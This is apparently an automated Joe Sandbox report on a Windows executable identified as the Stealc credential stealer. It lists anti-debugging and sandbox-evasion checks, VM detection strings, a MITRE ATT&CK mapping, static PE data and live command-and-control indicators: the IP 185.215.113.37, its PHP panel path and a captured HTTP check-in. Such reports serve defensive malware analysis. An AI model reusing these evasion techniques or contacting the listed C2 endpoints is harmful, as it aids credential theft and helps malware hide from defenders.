                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E238B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00E238B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E24910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E24910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E1DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00E1DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E1E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00E1E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E24570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00E24570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E1ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00E1ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E116D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E116D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E23EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00E23EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E1F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E1F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E1BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00E1BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E1DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00E1DE10
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E11160 GetSystemInfo,ExitProcess,0_2_00E11160
                Source: file.exe, file.exe, 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1448686604.00000000008DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1448686604.0000000000955000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1448686604.0000000000927000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
                Source: file.exe, 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13348
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13345
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13399
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13359
                Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-13366
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SICE
                Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E145C0 VirtualProtect ?,00000004,00000100,000000000_2_00E145C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E29860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00E29860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E29750 mov eax, dword ptr fs:[00000030h]0_2_00E29750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E278E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_00E278E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Yara detected Powershell download and execute
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7656, type: MEMORYSTR
                Searches for specific processes (likely to inject)
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E29600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00E29600
                Source: file.exeBinary or memory string: W|IProgram Manager
                Source: file.exe, 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: W|IProgram Manager
                Source: file.exe, 00000000.00000002.1449146691.00000000011FC000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: W|IProgram Manager=L*
                Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_00E27B90
                Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E27980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_00E27980
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E27850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_00E27850
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00E27A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_00E27A30

                Stealing of Sensitive Information

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.e10000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1448686604.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1400847337.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7656, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Remote Access Functionality

                barindex
                Yara detected Stealc
                Source: Yara matchFile source: 0.2.file.exe.e10000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1448998514.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1448686604.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000003.1400847337.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: file.exe PID: 7656, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		11
                Process Injection                		1
                Masquerading                		OS Credential Dumping2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		2
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts11
                Native API                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		33
                Virtualization/Sandbox Evasion                		LSASS Memory641
                Security Software Discovery                		Remote Desktop ProtocolData from Removable Media2
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
                Disable or Modify Tools                		Security Account Manager33
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive2
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection                		NTDS13
                Process Discovery                		Distributed Component Object ModelInput Capture12
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets1
                Account Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information                		Cached Domain Credentials1
                System Owner/User Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing                		DCSync1
                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe42%ReversingLabsWin32.Trojan.Generic
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                  		unknown
                  http://185.215.113.37/e2b1563c6670f193.phptrue
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.37file.exe, 00000000.00000002.1448686604.00000000008DE000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      http://185.215.113.37/e2b1563c6670f193.phpofile.exe, 00000000.00000002.1448686604.0000000000942000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://185.215.113.37/e2b1563c6670f193.phpTfile.exe, 00000000.00000002.1448686604.0000000000939000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://185.215.113.37/wsfile.exe, 00000000.00000002.1448686604.0000000000939000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://185.215.113.37/e2b1563c6670f193.php8file.exe, 00000000.00000002.1448686604.0000000000939000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              185.215.113.37
                              		unknownPortugal
                              		206894WHOLESALECONNECTIONSNLtrue

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1520515
                              Start date and time:2024-09-27 12:52:06 +02:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 4m 58s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:10
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:file.exe
                              Detection:MAL
                              Classification:mal100.troj.evad.winEXE@1/0@0/1
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 80%
                              • Number of executed functions: 19
                              • Number of non-executed functions: 88
                              Cookbook Comments:
                              • Found application associated with file extension: .exe

                              Warnings

                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • VT rate limit hit for: file.exe

                              Simulations

                              Behavior and APIs

                              No simulations

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              8y4qT1eVpi.exeGet hashmaliciousAmadey, StealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37/e2b1563c6670f193.php
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37/e2b1563c6670f193.php

                              Domains

                              No context

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousAmadeyBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousAmadeyBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37
                              8y4qT1eVpi.exeGet hashmaliciousAmadey, StealcBrowse
                              • 185.215.113.103
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousAmadeyBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousStealc, VidarBrowse
                              • 185.215.113.37
                              file.exeGet hashmaliciousAmadeyBrowse
                              • 185.215.113.16
                              file.exeGet hashmaliciousStealcBrowse
                              • 185.215.113.37

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              No created / dropped files found

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.946449456437186
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:file.exe
                              File size:1'853'952 bytes
                              MD5:fb6e05d5c008f119efcdeefe60d6e924
                              SHA1:76fca4e5da3cff2eee99634b2f442850000ce47f
                              SHA256:b01a2006b9ca98754e6c54ea5940b99dba53720fd9f0b83a4024a7061723f90d
                              SHA512:dfbf12f37b792017329c03fbaec55d4a2cd3c4735defe551d25b91468ed20a2413efcd5c762b2ea68b64028ae895e547141140589500f7156468652696bb342a
                              SSDEEP:24576:qnSxEL5/h2QbgoJH7kBuNdi2dxda+AkFH4tipqAKNIwDLr4907QZJyMM7loA6fwz:q15/4M73Rn4tOzm7k0e0ot4dpv
                              TLSH:22853373ED9BC6F2D1B623B8ADF39B722476723104C86D80FAE3D16D4A2B5D9240424D
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L.../..f...........

                              File Icon

                              Icon Hash:00928e8e8686b000

                              Static PE Info

                              General

                              Entrypoint:0xaa2000
                              Entrypoint Section:.taggant
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                              Time Stamp:0x66F1BA2F [Mon Sep 23 18:57:51 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:2eabe9054cad5152567f0699947a2c5b

                              Entrypoint Preview

                              Instruction
                              jmp 00007F0791039D4Ah
                              movaps xmm3, dqword ptr [eax+eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              jmp 00007F079103BD45h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [edx+ecx], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              or dword ptr [eax+00000000h], eax
                              add byte ptr [eax], al
                              and byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              or ecx, dword ptr [edx]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              adc byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add al, byte ptr [00000000h]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add al, 0Ah
                              add byte ptr [eax], al
                              add ecx, dword ptr [edx]
                              add byte ptr [eax], al
                              pop es
                              or al, byte ptr [eax]
                              add byte ptr [ecx], al
                              or al, byte ptr [eax]
                              add byte ptr [ebx], cl
                              or al, byte ptr [eax]
                              add byte ptr [edx], al
                              or al, byte ptr [eax]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al

                              Rich Headers

                              Programming Language:
                              • [C++] VS2010 build 30319
                              • [ASM] VS2010 build 30319
                              • [ C ] VS2010 build 30319
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              • [LNK] VS2010 build 30319

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              0x10000x25b0000x22800603926d2fc830520e0a55e67ce4f6455unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              0x25e0000x2a40000x200cd856f0e11999a7d6f0936624f84891funknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              fychohlw0x5020000x19f0000x19e800e0d647f641a347f1bf1bd8c131e66d1cFalse0.9948268103513269data7.953428588983157IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              iljhrjsp0x6a10000x10000x4007c44cc606cd30ce54a989af801b22333False0.7333984375data5.8180654555241125IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .taggant0x6a20000x30000x2200feb3a0155170fd00729d0411f821436bFalse0.06824448529411764DOS executable (COM)0.8008775157846104IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                              Imports

                              DLLImport
                              kernel32.dlllstrcpy

                              Network Behavior

                              Suricata IDS Alerts

                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2024-09-27T12:53:04.908577+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.849705185.215.113.3780TCP

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Sep 27, 2024 12:53:03.193026066 CEST4970580192.168.2.8185.215.113.37
                              Sep 27, 2024 12:53:03.197923899 CEST8049705185.215.113.37192.168.2.8
                              Sep 27, 2024 12:53:03.198035955 CEST4970580192.168.2.8185.215.113.37
                              Sep 27, 2024 12:53:03.198350906 CEST4970580192.168.2.8185.215.113.37
                              Sep 27, 2024 12:53:03.203154087 CEST8049705185.215.113.37192.168.2.8
                              Sep 27, 2024 12:53:04.677123070 CEST8049705185.215.113.37192.168.2.8
                              Sep 27, 2024 12:53:04.677175045 CEST8049705185.215.113.37192.168.2.8
                              Sep 27, 2024 12:53:04.677206993 CEST8049705185.215.113.37192.168.2.8
                              Sep 27, 2024 12:53:04.677290916 CEST4970580192.168.2.8185.215.113.37
                              Sep 27, 2024 12:53:04.677290916 CEST4970580192.168.2.8185.215.113.37
                              Sep 27, 2024 12:53:04.678181887 CEST4970580192.168.2.8185.215.113.37
                              Sep 27, 2024 12:53:04.680419922 CEST4970580192.168.2.8185.215.113.37
                              Sep 27, 2024 12:53:04.688359022 CEST8049705185.215.113.37192.168.2.8
                              Sep 27, 2024 12:53:04.908241987 CEST8049705185.215.113.37192.168.2.8
                              Sep 27, 2024 12:53:04.908576965 CEST4970580192.168.2.8185.215.113.37
                              Sep 27, 2024 12:53:08.181055069 CEST4970580192.168.2.8185.215.113.37

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Sep 27, 2024 12:53:21.134094954 CEST53498131.1.1.1192.168.2.8
                              Sep 27, 2024 12:53:47.696178913 CEST5363785162.159.36.2192.168.2.8
                              Sep 27, 2024 12:53:48.171704054 CEST53617191.1.1.1192.168.2.8

                              HTTP Request Dependency Graph

                              • 185.215.113.37

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.849705185.215.113.37807656C:\Users\user\Desktop\file.exe
                              TimestampBytes transferredDirectionData
                              Sep 27, 2024 12:53:03.198350906 CEST89OUTGET / HTTP/1.1
                              Host: 185.215.113.37
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              Sep 27, 2024 12:53:04.677123070 CEST203INHTTP/1.1 200 OK
                              Date: Fri, 27 Sep 2024 10:53:03 GMT
                              Server: Apache/2.4.52 (Ubuntu)
                              Content-Length: 0
